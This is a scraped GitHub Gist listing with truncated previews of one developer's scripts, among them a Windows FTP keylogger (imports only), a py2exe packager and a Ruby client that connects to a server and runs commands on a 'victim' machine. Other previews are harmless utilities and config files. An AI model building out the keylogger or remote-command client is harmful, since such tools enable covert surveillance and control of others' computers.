This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://github.com/alexavlonitis | |
# Simple ftp keylogger for Windows | |
from ftplib import FTP | |
import win32api | |
import sys | |
import pythoncom, pyHook | |
import os | |
import datetime, time | |
import socket |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from distutils.core import setup | |
import py2exe, sys, os | |
sys.argv.append('py2exe') | |
setup( | |
options = {'py2exe': {'bundle_files': 1, 'compressed': True}}, | |
windows = [{'script': "test.py"}], | |
zipfile = None, | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Public IP finder project v1.0 by Alex Avlonitis http://alex.avlonitis.me | |
""" | |
import urllib | |
import re | |
import os | |
import smtplib | |
#######SMTP CONFIGURATION####### | |
def emails(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://github.com/alexavlonitis | |
# to use this script run perl cisco_backup.pl "cisco enable password" # | |
use Net::SSH2; | |
use Net::Telnet::Cisco; | |
use warnings; | |
use strict; | |
my $user = "username"; #username of your switches | |
my $password = $ARGV[0]; #argument for the password |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ruby script encrypts files with OpenSSL | |
# https://github.com/alexavlonitis | |
i = 1 | |
while i != 0 do | |
puts "---MENU---" | |
puts "(1) to Encrypt" | |
puts "(2) to Decrypt" | |
puts "(3) to Exit" | |
print ": " |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<<APP>> change this variables |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Additional translations at https://github.com/plataformatec/devise/wiki/I18n | |
el: | |
devise: | |
confirmations: | |
confirmed: 'Ο λογαριασμός σας επιβεβαιώθηκε με επιτυχία.' | |
send_instructions: 'Σε λίγα λεπτά θα λάβετε οδηγίες για το πώς θα επιβεβαιώσετε το email σας.' | |
send_paranoid_instructions: 'Αν το email σας υπάρχει στη βάση δεδομένων μας, θα λάβετε email με οδηγίες για την επιβεβαίωση του λογαριασμού σας.' | |
failure: | |
already_authenticated: 'Είστε ήδη συνδεδεμένος.' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class Anagram | |
attr_reader :results | |
def initialize(word_list) | |
file = File.open(word_list).read | |
@words_hash_map = {} | |
@words_array = [] | |
@results = {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://github.com/AlexAvlonitis/ | |
# Run: ruby client.rb, connects to server and awaits commands, aka victim | |
require 'socket' | |
require 'open3' | |
class Client | |
HOSTNAME = 'localhost' | |
PORT = 2000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Desktop Entry] | |
Encoding=UTF-8 | |
Name=Mozilla Firefox | |
GenericName=Web Browser | |
Comment=Browse the Web | |
Exec=firefox %u | |
Icon=/home/your_username/opt/firefox/browser/chrome/icons/default/default128.png | |
Terminal=false | |
Type=Application | |
StartupWMClass=Firefox Developer Edition |
OlderNewer